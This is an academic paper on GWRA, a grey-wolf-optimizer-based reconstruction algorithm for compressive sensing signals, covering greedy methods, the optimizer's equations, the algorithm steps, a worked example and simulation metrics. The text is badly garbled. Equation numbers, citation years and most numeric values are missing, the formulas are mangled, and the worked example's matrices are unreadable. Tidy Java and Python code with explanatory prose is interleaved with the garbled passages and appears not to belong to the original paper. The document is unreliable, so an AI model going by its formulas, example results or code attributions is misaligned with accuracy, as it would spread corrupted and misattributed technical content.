xu d, thomas l, kent m, mouelhi t, le traon y. a model-based approach to automated testing of access control policies. in: proceedings of the acm symposium on access control models and technologies (sacmat). new york: association for computing machinery.
gwra: grey wolf based reconstruction algorithm for compressive sensing signals
ahmed aziz, karan singh, ahmed elsawy, walid osamy and ahmed m. khedr
computer science department, faculty of computers and artificial intelligence, benha university, benha, egypt; school of computer and systems sciences, jawaharlal nehru university, new delhi, india; department of computer science, university of sharjah, sharjah, united arab emirates.

abstract
the recent advances in compressive sensing (cs) based solutions make it a promising technique for signal acquisition, image processing and other types of data compression needs. in cs, the most challenging problem is to design an accurate and efficient algorithm for reconstructing the original data. greedy-based reconstruction algorithms have proved to be a good solution to this problem because of their fast implementation and low-complexity computations. in this paper, we propose a new optimization algorithm called the grey wolf reconstruction algorithm (gwra). gwra is inspired by the benefits of integrating both the reversible greedy algorithm and the grey wolf optimizer algorithm. the effectiveness of the gwra technique is demonstrated and validated through rigorous simulations. the simulation results show that gwra significantly exceeds greedy-based reconstruction algorithms such as sum product, orthogonal matching pursuit, compressive sampling matching pursuit and filtered back projection, as well as swarm-based techniques such as ba and pso, in terms of reducing the reconstruction error, the mean absolute percentage error and the average normalized mean squared error.

subjects: artificial intelligence, computer networks and communications, network science and online social networks
keywords: average normalized mean squared error, compressive sensing, greedy-based reconstruction algorithm, grey wolf optimizer, mean absolute percentage error, reconstruction algorithms

how to cite this article: aziz a, singh k, elsawy a, osamy w, khedr am. gwra: grey wolf based reconstruction algorithm for compressive sensing signals. peerj comput. sci. corresponding author: ahmed aziz, ahmed.aziz@fci.bu.edu.eg. academic editor: xiangjie kong. copyright aziz et al., distributed under creative commons cc-by.

introduction
exploiting the sparse nature of signals is highly challenging in various signal processing applications such as signal compression and inverse problems, and this motivated the development of compressive sensing (cs) methodologies (donoho, ). cs provides an alternative method of compressing data, offering a new signal sampling theory that can be adopted in a variety of applications including data and sensor networks (cevher & jafarpour, ), medical systems, image processing and video cameras, signal detection, analog-to-digital converters (choi et al., ) and several other applications. cs reconstruction problems are solved by convex algorithms and greedy algorithms (gas). convex algorithms are not efficient because they require highly complex computations. thus, most researchers choose gas, which are faster and give the same performance as convex algorithms in terms of minimum reconstruction error.
on the other hand, gas do not give a global solution, as all heuristic algorithms that execute a blind search usually get stuck in local optima. in this paper, we use the grey wolf optimizer (gwo), a metaheuristic algorithm that is prominent in finding global solutions. only a few works involving swarm algorithms have been proposed to solve the cs reconstruction problem, such as bao et al. ( ) and du, cheng & liu ( ), where the authors used the bat and pso algorithms to reconstruct cs data. however, these two algorithms (bao et al., ; du, cheng & liu, ) have a number of drawbacks, such as slow convergence velocity and a tendency to fall into local optima. in contrast, the gwo algorithm has shown better performance than other swarm optimization algorithms (mirjalili, mohammad mirjalili & lewis, ).

problem formulation
consider x[n], n = 1, ..., N, the vector of sensor node readings, where N represents the number of sensor nodes. any individual signal in R^N can be expressed using a basis of N x 1 vectors \{\psi_i\}, i = 1, ..., N. employing the N x N basis matrix \Psi = [\psi_1 | \psi_2 | ... | \psi_N], with the vectors \psi_i as its columns, we can represent the signal x as given below (donoho, ):

x = \sum_{i=1}^{N} g_i \psi_i    (1)

this representation is in terms of the N x N orthonormal basis transform matrix \Psi. here, g denotes the N x 1 sparse representation of x. cs focuses on signals with a sparse representation: the number of basis vectors contributing to x is s, such that s << N, so (N - s) values of g are zero and only s values are non-zero. using eq. (1), the compressed samples y (compressive measurements) can be obtained as:

y = \Phi x = \Phi \Psi g = \Theta g    (2)

here, the compressed samples vector y \in R^M, with M << N, and \Theta is an M x N matrix. the challenge of solving an underdetermined set of linear equations has motivated researchers to investigate this problem, and as a result diverse practical applications have emerged to meet this challenge. in the cs approach, the main responsibility is to offer an efficient reconstruction method enabling the recovery of the large, sparse signal with the help of the few available measurement coefficients. reconstructing the signal from this incomplete set of measurements is really challenging and relies on the sparse representation of the signal. the most direct approach for recovering the original sparse signal from its small set of linear measurements, as shown in eq. (2), is to minimize the number of non-zero entries, that is, to solve the \ell_0 minimization problem. the reconstruction problem can thus be expressed as

\hat{x} = \arg\min \|x\|_0  subject to  y = \Phi x    (3)

the \ell_0 minimization problem works well in theory, but in general it is an np-hard problem (mallat & wavelet, ; candes & tao, ), and hence eq. (3) is computationally intractable for arbitrary vectors and matrices.
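as a toy numerical illustration of eq. (2), with an arbitrary random matrix and made-up values rather than data from this paper, the following snippet compresses an 8-sample, 3-sparse signal into 4 measurements:

    public class ToyCompression {
        public static void main(String[] args) {
            double[] x = {0, 0, 2.0, 0, 0, -1.5, 0, 0.7};      // sparse signal, s = 3 non-zero entries
            double[][] phi = new double[4][8];                 // m x n measurement matrix, m = 4, n = 8
            java.util.Random rng = new java.util.Random(7);
            for (int i = 0; i < 4; i++)
                for (int j = 0; j < 8; j++)
                    phi[i][j] = rng.nextGaussian();            // random gaussian entries

            double[] y = new double[4];                        // compressed samples, m << n
            for (int i = 0; i < 4; i++)
                for (int j = 0; j < 8; j++)
                    y[i] += phi[i][j] * x[j];

            // these four measurements are what a reconstruction algorithm starts from
            System.out.println(java.util.Arrays.toString(y));
        }
    }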
the original signal reconstruction problem can be viewed as an optimization problem and numerous algorithms have been proposed with this intention. according to the cs method, the reconstruction algorithms for recovering the original sparse signal can be broadly categorized into two types: (i) convex relaxation, (ii) ga. convex relaxation based optimization corresponds to a class of algorithms which make use of linear programming approach to solve the reconstruction problem. these techniques are capable of finding optimal/near optimal solutions to the reconstruction issues, but they have relatively high computational complexity. the examples for such algorithms are least absolute shrinkage and selection operator, basis pursuit and basis pursuit de-noising. in order to overcome the computational complexity of recovering the sparse signal, a family of ga/iterative algorithms have been introduced. ga solves the reconstruction problem in greedy/iterative fashion, with reduced complexity (chartrand & yin ). therefore, ga is more adoptable for signal reconstruction in cs. ga techniques are classified into two categories: (i) reversible, (ii) irreversible. both of them follows identical steps, detects the support-set making use of matched filter (mf) and after that constructs the original sparse signal using least squares (ls) method. in reversible ga, an element inserted to the support-set can be removed anytime, following a backward step. however, in irreversible ga, an element inserted to the support-set will remain there until the search ends. examples for reversible ga includes sum product (sp; dai & milenkovic, ), compressive sampling matching pursuit (cosamp; needell & tropp, ) etc., whereas orthogonal matching pursuit (omp; tropp & gilbert, ) belongs to the class of irreversible ga algorithms. the authors of mirjalili, mohammad mirjalili & lewis ( ) proposed a swarm intelligent technique, gwo, well tested with benchmark functions. the benchmark functions used are minimization functions and are divided into four groups: unimodal, multimodal, fixed-dimension multimodal and composite functions. the gwo algorithm is compared to pso as an si-based technique and gsa as a physics-based algorithm. in addition, the gwo algorithm is compared with three eas: de, fast evolutionary programing and evolution strategy with covariance matrix adaptation. the results showed that gwo is able to provide highly competitive results compared to well-known heuristics such as pso, gsa, de, ep and es. first, the results on the unimodal functions showed the superior exploitation of the gwo algorithm. second, the exploration ability of gwo is confirmed by the results on multimodal functions. third, the results of the composite functions showed high local optima avoidance. finally, the convergence analysis of gwo confirmed the convergence of this algorithm. finding the global optimum precisely requires balancing the exploration and exploitation (i.e., good equilibrium) and this balance can be achieved using gwo (faris et al., ). aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here, we propose a new grey wolf based reconstruction algorithm (gwra) for cs signal reconstruction. gwra algorithm is inspired from the gwo and the reversible ga. gwra has two forward steps (ga forward and gwo forward) and one backward step. 
during the first iteration, gwra matches filter detection to initialize the support set (ga forward step) and adds q elements to it. then, gwra increases the search space in this iteration by selecting extra k elements depending on gwo algorithm (gwo forward step) and then solves the ls equation to select the best k elements from q + k elements (backward step). summary of the contributions in this paper: . develop a novel reconstruction algorithm based on grey wolf optimizer (gwra) that: (a) utilizes the advantages of gas to initialize the forward steps and (b) utilizes the advantages of gwo algorithm that enlarges the search space to determine the optimal output and recover the data. . provide extensive experiments, and the subsequent results illustrate that gwra exhibit high performance results than the existing techniques in terms of reconstruction error. the rest of this paper is divided as follows: the related research of the proposed problem is described in the section “related research.” in the section “grey wolf optimizer background” presents the gwo background. then in section “grey wolf reconstruction based algorithm,” we introduce our method to solve the proposed problem with the illustration of a numerical example scenario. the simulation results of our approach and a case study scenario is given in the section “simulation results.” finally, the paper is concluded in the section “conclusion.” table explains the abbreviations which are used this manuscript. table shows the notations used throughout the paper. related research compressive sensing has become an attractive approach, convenient for use in internet of things (iot) platforms, which utilizes the sparse nature of sensor signals. the signal is compressed (reduce signal dimension) from n to m such that m << n, which will result in table the following abbreviations are used in this manuscript. cs compressive sensing iot internet of things mape mean absolute percentage error ga greedy algorithm anmse average normalized mean squared error cosamp compressive sampling matching pursuit omp orthogonal matching pursuit algorithm gwo grey wolf optimizer mp matching pursuit fbp filtered back projection sp sum-product algorithm bp basis pursuit aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ transmission of fewer samples, making it suitable for iot applications that hold continuous data. the main challenge in cs approach is to provide reconstructed signal with an acceptable quality. several reconstruction algorithms have been developed to meet this requirement. the convex reconstruction approach converts the problem defined in eq. ( ) to convex optimization problem, replacing non-convex l minimization problem with convex l , as defined in eq. ( ). x ¼ arg min xk k subject to y ¼ fx ( ) equation ( ) is then solved using the l -magic toolbox (davenport et al., ) or any such problem solvers or using any linear programming methods. although these techniques are capable of finding optimal/near optimal solutions to the reconstruction issues, the relatively high computational complexity make them inappropriate for iot applications. on the other hand, ga-based algorithms could be suitable for iot networks, as they solve the reconstruction problem with low computation and reduced complexity. 
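The convex relaxation route mentioned above can be written as a linear program. The sketch below solves basis pursuit (minimize ||x||1 subject to Φx = y) with SciPy's generic LP solver by splitting x into non-negative parts; it is only an illustration of the convex approach and its cost, not the l1-magic toolbox cited in the text, and the example sizes are assumptions.

```python
# Hedged sketch of the convex l1 relaxation as a linear program (not l1-magic).
import numpy as np
from scipy.optimize import linprog

def basis_pursuit(Phi, y):
    """min ||x||_1 subject to Phi @ x = y, via the split x = u - v with u, v >= 0."""
    m, n = Phi.shape
    c = np.ones(2 * n)                      # objective: sum(u) + sum(v) = ||x||_1
    A_eq = np.hstack([Phi, -Phi])           # Phi @ (u - v) = y
    res = linprog(c, A_eq=A_eq, b_eq=y,
                  bounds=[(0, None)] * (2 * n), method="highs")
    u, v = res.x[:n], res.x[n:]
    return u - v

# Tiny usage example with an exactly sparse signal (illustrative sizes).
rng = np.random.default_rng(1)
n, m, k = 60, 30, 4
x = np.zeros(n); x[rng.choice(n, k, replace=False)] = rng.standard_normal(k)
Phi = rng.standard_normal((m, n))
x_hat = basis_pursuit(Phi, Phi @ x)
print("max reconstruction error:", np.max(np.abs(x_hat - x)))
```

Solving this LP is what makes the convex route computationally heavy compared with the greedy methods described next.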
in mallat & zhang ( ) matching pursuit algorithm (mp) is considered as the first ga based algorithm in which the support-set is initialized by the index of the largest table table of notations. notation description x original signal m number of measurements y compressed sample f cs matrix � transform matrix k signal sparsity level g sparse presentation of x r residual of y x wolf position xp prey position q number of selected columns by wolf algorithm xa a wolf position xβ β wolf position xd d wolf position r support set c search set c sub-matrix contains columns with indices c from matrix best best solution or xa secbest second best solution or xβ thirbest third best solution or xd f fitness value x′ estimated solution t number of iterations † pseudo-inverse l indices set of largest k magnitude entries in ’c yy aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ magnitude entries in ty, this step is called forward step and then it solves the ls problem. however, mp algorithm does not consider the non-orthogonality of the cs matrix which leads to incorrect selection to the columns corresponding to the non-zero values. this drawback has been solved by omp algorithm (tropp & gilbert, ). the omp algorithm selects the index of the largest magnitude entries in tr during each iteration, where r is the residual of y, and then solves the ls problem. different algorithms have been proposed based on omp algorithm as in donoho et al. ( ) and needell & vershynin ( ). in donoho et al. ( ), a faster and enhanced version of omp called stagewise omp (stomp) is proposed. stomp enhances the forward step of omp by selecting a number of columns, instead of one column as in omp, the magnitude values of the columns in tr are greater than a threshold and then uses these columns for solving the ls problem. in needell & vershynin ( ), in each iteration, the inner-products with similar magnitudes are grouped into sets and the maximum energy set is then selected. the above algorithms are classified as irreversible ga class, as they do not have a backward step. backward step allows the algorithm to remove the wrong selection of elements during the forward step, i.e., in these algorithms, once an element is inserted to the support-set this element remains there until the search ends. however, in reversible gas such as sp (dai & milenkovic, ), iht (cevher & jafarpour, ), cosamp (needell & tropp, ) and filtered back projection (fbp; burak & erdogan, ) algorithms, backward step is used to prune the wrong elements that have been added to the support-set during the forward step. in cosamp and sp, initialization of support-set is done by placing the indices of b largest-magnitude components of f′y. the size of b is different in each algorithm, for example, b = k in sp and b = k in cosamp where the value of sparsity level k is known. on the other hand, fbp (burak & erdogan, ) algorithm has the ability to perform without the knowledge of k. it assigns forward and backward step size depending on the measurements size. in cevher & jafarpour ( ), the iht algorithm considers iterative gradient search algorithm which updates the estimate-set depending on e gradient of the residue and keeps only the largest k entries by removing the wrong selection. even though ga based reconstruction have become significantly popular for recovery of cs signals, in general they do not provide optimal solution to the problem of cs reconstruction (du, cheng & chen, ). 
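The greedy forward/least-squares structure just described is easiest to see in OMP itself. The sketch below follows the textbook description given above (add the index of the largest-magnitude entry of Φᵀr to the support-set, re-solve least squares on that support, update the residual); it is a generic illustration assuming NumPy, not the authors' implementation.

```python
# Minimal OMP sketch: irreversible greedy selection plus a least-squares step.
import numpy as np

def omp(Phi, y, k):
    m, n = Phi.shape
    support = []
    r = y.copy()                                   # residual of y
    for _ in range(k):
        j = int(np.argmax(np.abs(Phi.T @ r)))      # forward step (matched filter)
        if j not in support:
            support.append(j)                      # once added, never removed
        coeffs, *_ = np.linalg.lstsq(Phi[:, support], y, rcond=None)  # LS step
        r = y - Phi[:, support] @ coeffs           # update the residual
    x_hat = np.zeros(n)
    x_hat[support] = coeffs
    return x_hat, support

# usage: x_hat, S = omp(Phi, y, k)
```

Reversible methods such as SP, CoSaMP and FBP differ only in adding a backward step that can prune wrongly selected indices from the support-set.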
in bao et al. ( ), the authors utilized the efficiency of the swarm algorithm bat in finding the optimal solution of cs reconstruction problem. also, in du, cheng & liu ( ), pso algorithm is used for cs data reconstruction. the results showed that gwo is able to provide highly competitive results compared to well-known heuristics algorithms such as pso, gsa, de, ep and es (mirjalili, mohammad mirjalili & lewis, ). in contrast, the gwo algorithm displays better performance than other swarm optimization algorithms. here, we introduce a new technique (gwra), integrating the advantages of both ga and gwo in determining the optimal output for the desired problem of cs reconstruction. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grey wolf optimizer background grey wolf optimizer can be defined as an intelligent meta-heuristic approach, inspired by group hunting behavior of grey wolves (mirjalili, mohammad mirjalili & lewis, ). the gwo method simulates the social behavior and hierarchy of grey wolves and their hunting method. the hierarchal leadership divides the grey wolves into four categories: (i) alpha (a), (ii) beta (β), (iii) delta (d) and (iv) omega (v) as shown in fig. . the a grey wolves are principally the leaders of their strict dominant hierarchy, responsible and powerful for decision making and leads the whole group during hunting, feeding, migration etc. the subordinates of alpha wolves are called β wolves and they are placed on the second level of the grey wolves’ hierarchy. they act as advisors and help the alpha wolves in making decisions. finally, d wolves execute alpha and beta wolves’ decision and manage v wolves which are considered as the lowest ranking members of grey wolves hierarchy. in gwo, a, β and d guide the optimization process, where gwo considers the best solution and position for a wolves. in addition, the second and third best solutions and positions are assigned for β and d, respectively. the other solutions are called v solutions which always follow the solution of the other three wolves. the mathematical representation of surrounding the prey and hunting process in gwo algorithm can be modelled as follows: surrounding the prey in the hunting process, the first step of grey wolves is “surrounding the prey,” which can be expressed mathematically as: d ¼ cxp � x tð Þ �� �� ( ) x t þ ð Þ ¼ xp � ad ( ) equation ( ) expresses the distance between the wolf and the prey, where x is the wolf position, xp is the prey position, t denotes the current iteration and c is coefficient vector which can be calculated using eq. ( ). the wolf’s position is updated using eq. ( ), where a denotes the coefficient vector and it can be calculated using eq. ( ). c ¼ r ( ) a ¼ ar � a ( ) figure grey wolfs’ hierarchal leadership (faris et al., ). full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here, r and r are random values in [ , ] and the values of a’s linearly decrease from to in each iteration. gwo hunting process after surrounding prey process, a, β and d wolves lead the hunting process. during the hunting process, gwo preserves the first three best solutions (according to their fitness values) for a, β and d, respectively and according to the position of wolves a, β and d, the other search agents (v) estimates their positions. 
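A small code sketch of the encircling-prey step may help. In the standard GWO formulation of Mirjalili, Mohammad Mirjalili & Lewis, the coefficient vectors are C = 2·r2 and A = 2·a·r1 − a, with a decreased linearly from 2 to 0 over the iterations, which matches the description above; the prey position, problem dimension and iteration count below are illustrative placeholders only.

```python
# Hedged sketch of the GWO encircling-prey update (standard formulation).
import numpy as np

rng = np.random.default_rng(2)

def encircle(x, x_prey, a):
    """One position update of a single wolf around an assumed prey position."""
    r1, r2 = rng.random(x.shape), rng.random(x.shape)
    A = 2 * a * r1 - a                 # coefficient vector A
    C = 2 * r2                         # coefficient vector C
    D = np.abs(C * x_prey - x)         # distance between the wolf and the prey
    return x_prey - A * D              # new wolf position

x, x_prey, t_max = rng.random(5), rng.random(5), 30
for t in range(t_max):
    a = 2 - 2 * t / t_max              # a decreases linearly from 2 to 0
    x = encircle(x, x_prey, a)
```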
then, they start to attack the prey. the behavior of this process can be represented mathematically as in eqs. ( – ) (faris et al., ): da ¼ c xa � xj j; db ¼ c xb � x �� ��; dd ¼ c xd � xj j ( ) x ¼ xa � a da; x ¼ xb � a db; xd ¼ xd � a dd ( ) x t þ ð Þ ¼ x þ x þ x ( ) after updating the positions of all wolves, the hunting process starts the next iteration to find the new best three solutions and repeat this process until the stopping condition is satisfied. algorithm presents the gwo technique. grey wolf reconstruction based algorithm in this section, the proposed gwra is described. gwra can be used by the base station to reconstruct the sensors readings again. gwra algorithm is inspired from the gwo algorithm and the reversible ga. gwra has two forward steps (ga forward and gwo forward) and one backward step. in the first iteration, gwra starts like any ga by algorithm gwo algorithm : initialize the grey wolf population xi (i = , , , : : : ,n) and t = . : initialize c, a, and a using equations ( ) and ( ). : calculate the fitness of each search agent. : put the best search agent as xa, the second best search agent as xβ and the third best search agent as xd. : while (t < max number of iterations) : for each search agent : modify the current search position using equation ( ). : end for : update a, a, and c. : calculate the fitness of all search agents. : modify xa, xβ and xd. : t = t + . : end while : return xa. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ initializing the support-set r with q elements using mf detection (ga forward step). gwra increases the search space (search set c) by selecting extra k elements depending on gwo algorithm (gwo forward step). then, gwra solves the ls equation to select the best k elements from q + k elements (backward step). figure gwra algorithm flow chart. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at the end of this iteration, gwra updates the support-set r with these k elements. from the second iteration, gwra depends only on gwo forward step to select new k elements and add them to c, i.e., c has � k elements in search space in each iteration to select the best k elements till it reaches the maximum number of iterations. flow chart of gwra is shown below in fig. . the difference between gwra and the other reversible ga like cosamp (needell & tropp, ) and sp (dai & milenkovic, ) algorithm is that in each iteration, gwra uses the strength of gwo algorithm to find the best k according to their fitness values that leads the search toward the optimal solution. gwra consists of two phases: initialization and reconstruction, as described below. initialization phase grey wolf reconstruction algorithm performs the following initialization in this phase: [ ]. initialize the support-set r with indices of t columns that corresponds to the largest q magnitude components in h, where h = ty. [ ]. initialize the size of q to m/ - k depending on the fact “cs reconstruction problem can be resolved if the sparsity level k � m/ ” [ ]. initializations [ ] and [ ] will be executed only once at the beginning of the gwra. [ ]. represent the search agents (wolves) positions as matrix xi � j, where i = number of wolves and j = k. 
each value of this matrix is a randomly selected integer [ , n], where n denotes the count of columns in , where each number represents an index of a column in f without duplication. [ ]. initialize xa, xβ and xd as vector � k all of its components equal to s. [ ]. initialize best = secbest = thirbest = infinity. [ ]. initialize outer-loop iteration t = . [ ]. initialize the stopping threshold ε = - . [ ]. initialize the estimated solution x′ = ø. reconstruction phase the details of the reconstruction phase are described as given below: [ ]. for each row i in matrix x do the following: a. create the search set c, where c = r ∪ {row #i of xi � j}. b. create the sub-matrix c from the cs matrix f. c includes the columns corresponding to the indices in c. c. create the set i as the k indices in c that have largest amplitude components of c †y. d. create sub-matrix l = fi, the columns of matrix f that corresponds to indices in set i (backward step). e. calculate the fitness value f(l), gwra uses the same fitness function in du, cheng & chen ( ) which can be expressed as follows: f lð Þ ¼ llyy � yk �� ( ) aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ f. if best > f(l), then best = f(l) and xa = i. g. otherwise if best < f(l) and secbest > f(l), then secbest = f(l) and xβ = i. h. otherwise if best < f(l), secbest < f(l) and thirbest > f(l), then thirbest = f(l) and xd = i. i. set r = i. [ ]. updating wolves position: this step updates each search agent’s position according to eq. ( ). the matrix x is updated according to the new position of xa, xβ and xd. [ ]. in order to keep the values of matrix x as integer values between [ , n], we modified eq. ( ) as follows: x t þ ð Þ ¼ ceil mod x þx þx ; n � �� � ( ) [ ]. check if t (the number of iterations) is less than the maximum count of iterations tmax or best > ε where ε = - , then t = t + and go to [ ] else stop and return x′ where x′i = l †y and x′s-i = where s = [ , : : : n]. algorithm presents the gwra algorithm. example scenario for clarification, we illustrate the actions of gwra using the following example: input: matrix f � (m = and n = ) with elements generated from uniform distribution, y = fx ∈ r is the compressed samples and the sparsity level k = . output: estimated signal x′. f � ¼ : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : bbbbbbbb@ cccccccca ; y ¼ : : : : : : ; x ¼ : : aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ initialization phase execution . support-set r = { }, the indices of columns of f that correspond to the largest q(= ) amplitude components in h = ty, where q ¼ m= � k ¼ . algorithm gwra : input: cs matrix fm � n, measurement vector y and sparsity level k. : output: estimated solution set x′: initialization phase: : r ≜ {indices of the q largest magnitude entries in ty}. : initialize the grey wolf population matrix xi � k with random integers between [ , n]. : xa = zeros ( , k), xβ = zeros ( , k), xd = zeros ( , k). : best = secbest = thirbest = ∞. : x′ = ø, ε = - and t = . reconstruction phase: : while (t < tmax||best > ε) : for each row i of the matrix xi � k do : c = union(r, row #i of xi � j) : i ≜ {indices of the k largest magnitude entries in c † y}. : l = i. : calculate the fitness value f(l) using equation . . 
if(best > f(l)), then : xa = i, : else if (best < f(l) && secbest > f(l)), then : secbest = f(l) and xβ = i. : else if (best < f(l) && secbest < f(l) && thirbest > f(l)), then : thirbest = f(l) and xd = i. : end if : set r = i. : end for : wolf positions updating step: : update a, a, and c : for each search agent : update the position of the current search agent by equation ( ). : end for : t = t + : end while : return x′ where x′i = l †y and x′s-i = l †y where s = [ , : : : n]. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ h ¼ : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : bbbbbbbb@ cccccccca t : : : : : : ¼ : : : : : : : : : : . matrix xi � k, where i = number of search agents (= ) and k = , will be initialized as follows: x � ¼ bbbb@ cccca . initialize xa, xβ and xd as xa = [ ], xβ = [ ] and xd = [ ]. best = secbest = thirbest = ∞. number of the outer-loop iteration is initialized to t = and the estimated solution x′ = ø. reconstruction phase execution . for each row i in the matrix do: when i = ○ c ¼ r [ frow of x � g ¼ f ; ; g; ○ create the sub-matrix fc by selecting the columns from f which correspond to the indices in c. ϕc ¼ ; ; f g ¼ : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ○ the set i will be created as the indices of the largest k(= ) amplitude components in fc †y: ϕc ¼ ; ; f g yy ¼ : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca y : : : : : : ¼ : : : i.e., i = { , }. and then we create the sub-matrix l ¼ ϕi ¼ : : : : : : : : : : : : bbbbbb@ cccccca ○ using eq. ( ), the fitness value f(l) of the sub-matrix will be . . ○ since best > f(l), best = . , xa = { , }. . repeating the same steps for all rows (i = , , , ) of x, we will have best = . , xa = i = { , }. r will be updated as r = i = { , }. . using eq. ( ), the updated position matrix x will be: x � ¼ bbbb@ cccca . since the stop criteria are not satisfied, the iteration number will be updated t = t + and execute reconstruction phase as follows: for each row i in the matrix do: (when i = ) ○ c = r ∪ {row in x} = { , , , }, ○ create the sub-matrix fc by selecting the columns from matrix f that correspond to indices in c. ϕc ¼ ; ; ; f g ¼ : : : : : : : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ○ create the set i as the indices of the largest k amplitude components in ϕc yy: ϕc yy ¼ : : : : : : : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca y : : : : : : ¼ : : : : : i.e., i = { , }. ○ the sub-matrix l will be: l ¼ fi ¼ : : : : : : : : : : : : bbbbbb@ cccccca ○ using eq. ( ), the fitness value f(l) of the sub-matrix l will be - . ○ since best > f(l), then best = - , xa = { , }. . repeating the same steps for every row of x (i = , , , ) in the wolf position matrix x, we will have best = - , xa = { , }, and updated r = i = { , }. . update each search agent’s position (matrix x) according to eq. ( ): x � ¼ bbbb@ cccca . according to the stop criteria best < - , stops and calculates x′ as following: x i¼ ; f g ¼ lyy ¼ : : : : : : : : : : : : bbbbbbbb@ cccccccca : : : : : : ¼ : : � � and then set x s�i ¼ ; ; ; ; ; ; ; f g ¼ : aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ then, the estimated signal x′ will be as follows: x ¼ : : which is equals to x. therefore, gwra succeeds to reconstruct the original data without any errors. simulation results in this section, the matlab environment is used for performing all simulations and the reconstruction is investigated by gaussian matrix f, of size m � n, where m = and n = . two types of data are used to evaluate the reconstruction performance of the proposed algorithm: computer generated data and real data set. in the first type, we used data generated from uniform and gaussian distribution as an example to evaluate the proposed algorithm. the whole process is repeated over times and then averaged on randomly generated k sparse samples. the performance evaluation of gwra and its comparison with the baseline algorithms such as cosamp (needell & tropp, ), omp (tropp & gilbert, ), sp (dai & milenkovic, ), fbp (burak & erdogan, ), ba (bao et al., ) and pso (du, cheng & liu, ) in terms of both average normalized mean squared error (anmse) and mean absolute percentage error (mape) is given below. the setting of used parameters is shown in table . performance metrics: the gwra algorithm reconstruction’s performance is compared with different reconstruction algorithms in terms of the following performance metrics: . average normalized mean squared error: the average ratio x�x =x defines the anmse, where x represents the initial reading and x′ represents the reconstructed one. . mean absolute percentage error: the ratio p x�x x �� ��� n defines the mape. average normalized mean squared error evaluation the gwra algorithm is evaluated in terms of anmse and the result is compared with the existing algorithms. figure illustrates the results of anmse evaluation in which gaussian distribution is used to generate the non-zero entries of the sparse signal. the results prove that gwra algorithm provides reduced anmse than cosamp, omp, fbp, ba, pso and sp. also, the anmse of gwra starts to increase only when k > while it increased when k > , k � , k � , k � , k � , k � for cosamp, omp, fbp, sp, ba, pso, respectively as shown in fig. . this is because gwra applies the grey wolves’ behavior to hunt the prey (k elements) inside search space (cs matrix) according to their fitness values (the best fitness values). then, in each iteration, the support-set will be updated with the best k elements, i.e., gwra has the best-estimated solution till it reaches the optimal one. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure illustrates the results of anmse evaluation in which uniform distribution is used to generate the non-zero entries of the sparse signal. the results prove that gwra algorithm still gives the lowest anmse value than cosamp, fbp, omp, sp, ba, pso as k > , k � , k > , k > , k > , k � , k > , respectively, because what any ga does in one round, gwra does it for each search agent and then it selects the best one in every iteration to converge at the optimal solution. in the second test, we measure the reconstruction performance of gwra as a function in terms of the length of measurement-vector and then compared the results using cosamp, fbp, sp, ba, omp, pso. the sparse signals are generated using gaussian distribution having length n = , m values varying from to with increment of . 
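All of the comparisons in this section are scored with the two metrics defined above. Because their definitions are only partly legible in the extracted text, the sketch below fixes one common reading purely for illustration: ANMSE as the trial-averaged ratio of squared l2 norms, and MAPE as the mean element-wise relative error expressed as a percentage (with a small guard against zero entries).

```python
# Hedged sketch of the evaluation metrics, assuming NumPy and one common
# reading of the (garbled) definitions in the text.
import numpy as np

def nmse(x, x_hat):
    """Normalized mean squared error for a single trial."""
    return np.sum((x - x_hat) ** 2) / np.sum(x ** 2)

def anmse(trials):
    """Average NMSE over a list of (x, x_hat) pairs, one per random trial."""
    return float(np.mean([nmse(x, x_hat) for x, x_hat in trials]))

def mape(x, x_hat, eps=1e-12):
    """Mean absolute percentage error; eps guards against zero-valued entries."""
    return float(np.mean(np.abs((x - x_hat) / (x + eps))) * 100.0)
```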
